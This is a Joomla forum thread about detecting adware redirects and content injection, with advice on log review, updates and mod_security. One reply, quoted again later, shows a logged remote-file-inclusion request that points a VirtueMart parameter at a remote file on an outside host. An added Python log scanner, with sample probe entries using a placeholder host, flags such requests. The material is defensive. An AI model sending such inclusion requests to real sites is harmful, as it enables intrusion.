Malware/Adware/Spyware Browser Redirects and Content Injects
Moderator: General Support Moderators
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
Malware/Adware/Spyware Browser Redirects and Content Injects
Hi,
What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?
We have found PCs in the past that redirect our site to a competitor's using the browser and have also found content such as contact details and phone numbers being replaced by competitors.
Any information to help determine this fact would be greatly appreciated. Most often this form of marketing goes by without the site admins' detection since it's not server side.
Thanks
Derek
-
- Joomla! Enthusiast
- Posts: 166
- Joined: Fri Sep 16, 2005 9:59 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Is it a Joomla based site?
Pay a security professional is the answer. Someone who will diagnose the problem and fix it and harden up your site security.
Oh and I'd pay for some training of your site's admins too as they clearly don't know enough, unless this is a virus/trojan related problem, in which case you have to have been corporately significant enough to be able to afford security professionals to resolve this.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
GarfieldLeChat wrote:
Is it a Joomla based site?
Pay a security professional is the answer. Someone who will diagnose the problem and fix it and harden up your site security.
Oh and I'd pay for some training of your site's admins too as they clearly don't know enough, unless this is a virus/trojan related problem, in which case you have to have been corporately significant enough to be able to afford security professionals to resolve this.
It's not server side related, it's the user's browser with malicious adware/spyware installed. I'm asking if anyone knows of a way to test for this kind of activity.
Thank you for the feedback though.
-
- Joomla! Enthusiast
- Posts: 166
- Joined: Fri Sep 16, 2005 9:59 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
ledneonflex wrote:
GarfieldLeChat wrote:
Is it a Joomla based site?
Pay a security professional is the answer. Someone who will diagnose the problem and fix it and harden up your site security.
Oh and I'd pay for some training of your site's admins too as they clearly don't know enough, unless this is a virus/trojan related problem, in which case you have to have been corporately significant enough to be able to afford security professionals to resolve this.
It's not server side related, it's the user's browser with malicious adware/spyware installed. I'm asking if anyone knows of a way to test for this kind of activity.
Thank you for the feedback though.
Sorry, still don't get what you're driving at; this is a Joomla help and community forum.
Are you asking is it possible to hijack a browser via malicious code? In which case the answer's yes. If you are asking if it's possible to tell which browsers come to your site using malicious code then possibly, but you'd need to pay someone to do it, and it would entirely depend on what you were looking for vs. the cost of having something bespoke programmed.
But this isn't really what these forums are for unless it's joomla related.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
GarfieldLeChat wrote:
ledneonflex wrote:
GarfieldLeChat wrote:
Is it a Joomla based site?
Pay a security professional is the answer. Someone who will diagnose the problem and fix it and harden up your site security.
Oh and I'd pay for some training of your site's admins too as they clearly don't know enough, unless this is a virus/trojan related problem, in which case you have to have been corporately significant enough to be able to afford security professionals to resolve this.
It's not server side related, it's the user's browser with malicious adware/spyware installed. I'm asking if anyone knows of a way to test for this kind of activity.
Thank you for the feedback though.
Sorry, still don't get what you're driving at; this is a Joomla help and community forum.
Are you asking is it possible to hijack a browser via malicious code? In which case the answer's yes. If you are asking if it's possible to tell which browsers come to your site using malicious code then possibly, but you'd need to pay someone to do it, and it would entirely depend on what you were looking for vs. the cost of having something bespoke programmed.
But this isn't really what these forums are for unless it's Joomla related.
I understand this. I'm asking if anyone knows of any tools that can test if adware/malware/spyware etc. is targeting your site, whether it's Joomla or not. Reason I ask in this forum is that the knowledge here is greater than most other forums and there are more subscribers.
Thank you for the feedback!
-
- Joomla! Guru
- Posts: 577
- Joined: Wed Aug 05, 2009 1:42 pm
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Greetings:
* Do make sure you've followed the security checklist for your Joomla installation.
* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.
* Do review your web site logs.
In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.
An example of what you might see for an injection is as follows:
"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"
* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not foolproof, and your provider may have to go through some fine tuning to remove false positives.
Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
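The log review recommended in the post above can be automated. The following is an added example, not code from the thread or from Joomla: it flags access-log entries in which a query parameter carries a remote URL, as in the quoted probe. The hostnames, the agent list and the sample entries are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line, status, size, referer and user agent of a combined-format entry.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
    r'(?:\d+|-) "[^"]*" "(?P<agent>[^"]*)"')
# A parameter whose value is itself a URL: the shape of the probe in the post.
REMOTE_PARAM_RE = re.compile(r'[?&]([\w\[\]]+)=((?:https?|ftp)://[^&\s]+)', re.I)
SCRIPT_AGENTS = ("libwww-perl", "curl", "wget")  # assumed list, tune per site
OWN_HOSTS = {"www.example.org"}                  # assumed: the site's own hostnames

def inspect(line):
    """Return a finding dict for a suspicious entry, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    target = unquote(unquote(m["target"]))  # undo single and double URL encoding
    # Redirect-style parameters pointing back at our own host are legitimate.
    params = [name for name, url in REMOTE_PARAM_RE.findall(target)
              if urlsplit(url).hostname not in OWN_HOSTS]
    if not params:
        return None
    return {"params": params,
            "scripted": any(a in m["agent"].lower() for a in SCRIPT_AGENTS),
            # A 2xx/3xx reply means the request was served: review that component first.
            "served": m["status"][0] in "23"}

def scan(lines):
    """Return (line number, finding) for every flagged entry."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := inspect(line))]

# Constructed sample entries; the first is shaped like the one quoted in the post.
SAMPLE = [
    '203.0.113.7 - - [12/Oct/2009:06:25:11 +0000] "GET /index.php?option=com_content'
    '&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php'
    '?mosConfig_absolute_path=http://files.example.net/x.txt??? HTTP/1.1" '
    '500 3560 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [12/Oct/2009:06:25:40 +0000] "GET /index.php'
    '?mosConfig_absolute_path=http%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Oct/2009:06:26:02 +0000] "GET /index.php?option=com_user'
    '&return=http://www.example.org/home HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Oct/2009:06:26:09 +0000] "GET /index.php?option=com_content'
    '&id=12 HTTP/1.1" 200 8452 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, finding in scan(SAMPLE):
        print(lineno, finding)
```

A flagged entry with `served` set does not prove a compromise; it marks the requests to check against file integrity and component versions first.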
-
- Joomla! Enthusiast
- Posts: 166
- Joined: Fri Sep 16, 2005 9:59 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
dynamicnet wrote:
Greetings:
* Do make sure you've followed the security checklist for your Joomla installation.
* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.
* Do review your web site logs.
In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.
An example of what you might see for an injection is as follows:
"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"
* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not foolproof, and your provider may have to go through some fine tuning to remove false positives.
Thank you.
See, all of this is generic advice which isn't actually what they appear to be asking, which seems to be, if I've got this right, can a site owner tell which infected browsers from a machine or set of machines are visiting their site...
And the answer is specialist bespoke programming, not generalised advice, I'm afraid.
If your site is being hit with big old attacks focused from a particular source or sources then it's unlikely that the browser the user is using will affect your machine unless it's being used to directly launch attacks as part of a wider campaign (i.e. zombie machine). You'll then get an IP address in your log files of that machine and in effect a browser code, however you'd be hard pressed to tell which is which without some kind of interpretation, and even hard pressed to prove that a user going to your site with malicious code in their browser was doing so knowingly... proving intent will be the downfall...
-
- Joomla! Guru
- Posts: 577
- Joined: Wed Aug 05, 2009 1:42 pm
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Greetings:
I believe my answer dealt specifically with "What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?" which is to review the web site logs and that will tell if attacks are incoming.
It is possible I misunderstood the question, and then the answer, of course, would be different.
Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
-
- Joomla! Guru
- Posts: 577
- Joined: Wed Aug 05, 2009 1:42 pm
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Greetings:
If you are not on the current version, then you are vulnerable.
Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Hi.. Yah it's slightly out of date.. we are in the process of upgrading to 1.5.. template is done and revised. Just porting over content and cleaning up the old site and making navigation much better as the old site is horrible.
Should be done soon. Is 1.5 vulnerable to xss? Anyone hear of any issues?
Thanks for all the feedback on this issue. Joomla forums are and always have been my favorite source of information regarding almost anything web related.
-
- Joomla! Guru
- Posts: 577
- Joined: Wed Aug 05, 2009 1:42 pm
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Greetings:
The latest release is clean for XSS attacks as far as I know... but if your security administrator installs mod_security on the server that will help as well.
Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.